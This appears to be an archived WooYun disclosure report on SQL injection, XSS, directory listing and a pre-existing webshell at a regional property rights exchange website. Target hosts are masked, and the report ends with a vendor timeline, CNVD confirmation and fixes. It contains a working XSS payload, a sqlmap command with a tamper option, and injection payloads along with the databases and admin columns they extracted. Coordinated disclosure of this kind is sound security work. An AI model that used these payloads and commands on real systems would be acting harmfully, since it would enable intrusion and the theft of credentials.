乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-16: 细节已通知厂商并且等待厂商处理中 2015-12-18: 厂商已经确认,细节仅向厂商公开 2015-12-28: 细节向核心白帽子及相关领域专家公开 2016-01-07: 细节向普通白帽子公开 2016-01-17: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
内蒙古产权交易中心存在SQL注入、XSS、铭感目录非授权浏览。还有发现网站已被别人getshell(见最后一张图)
1、XSS漏洞主页搜索框 http://**.**.**.**输入: ><script>alert("1")</script><
2、铭感目录浏览
3、爆出绝对路径
4、注入:
注入点:http://**.**.**.**/newsfb/symore.asp?cid=1735&did=&id=0&kyly=&lxid=&sjid=&snr=&sxz=&vcd=0&xldid=1对空格屏蔽所以sqlmap构造一下语句:sqlmap.py -u "http://**.**.**.**/newsfb/symore.asp?cid=1735&did=&id=0&kyly=&lxid=&sjid=&snr=&sxz=&vcd=0&xldid=1" --tamper "space2comment" 漏洞点:Parameter: xldid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: cid=1735&did=&id=0&kyly=&lxid=&sjid=&snr=&sxz=&vcd=0&xldid=1 AND 6674=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6674=6674) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(118)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 32 columns Payload: cid=1735&did=&id=0&kyly=&lxid=&sjid=&snr=&sxz=&vcd=0&xldid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(98)+CHAR(106)+CHAR(113)+CHAR(104)+CHAR(115)+CHAR(70)+CHAR(77)+CHAR(77)+CHAR(72)+CHAR(103)+CHAR(104)+CHAR(84)+CHAR(106)+CHAR(113)+CHAR(90)+CHAR(78)+CHAR(68)+CHAR(106)+CHAR(73)+CHAR(77)+CHAR(73)+CHAR(74)+CHAR(83)+CHAR(110)+CHAR(66)+CHAR(78)+CHAR(74)+CHAR(86)+CHAR(72)+CHAR(73)+CHAR(115)+CHAR(85)+CHAR(82)+CHAR(114)+CHAR(113)+CHAR(106)+CHAR(110)+CHAR(88)+CHAR(114)+CHAR(65)+CHAR(101)+CHAR(79)+CHAR(74)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-----库名available databases [7]:[*] master[*] model[*] msdb[*] nmcqjy_com[*] ReportServer[*] ReportServerTempDB[*] tempdb表名:Database: nmcqjy_com[26 tables]+---------------------+| D99_CMD || D99_Tmp || admin || class || content || dx_data || fzlb || hyzc || info || kjtjsq || lyb || n_tab01 || n_tab02 || n_tab03 || n_tab04 || pangolin_test_table || rscmm || tab01 || tab02 || tab03 || tab04 || tab05 || tab06 || tab07 || tab08 || tab09 |+---------------------+admin表的列名:Database: nmcqjy_comTable: admin[11 columns]+-------------+----------+| Column | Type |+-------------+----------+| bmjf | int || bmpd | int || dwbm | nvarchar || dwmc | nvarchar || flag | int || id | int || LastLoginIP | nvarchar || nwwebid | int || password | nvarchar || username | nvarchar || wzjsp | int |+-------------+----------+注入就到处为止
注入证明:
只做测试,准备结束发现下面这个(别人的):http://**.**.**.**/fmzcczpt/inc/bin.asp
明显被黑了很久了,希望网站管理者好好彻底清查一遍吧!毕竟产权交易中心影响很大…………………………
过滤,增加文件路径浏览权限,彻底清查网站吧!
危害等级:高
漏洞Rank:10
确认时间:2015-12-18 10:38
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发内蒙古分中心,由其后续协调网站管理单位处置。
暂无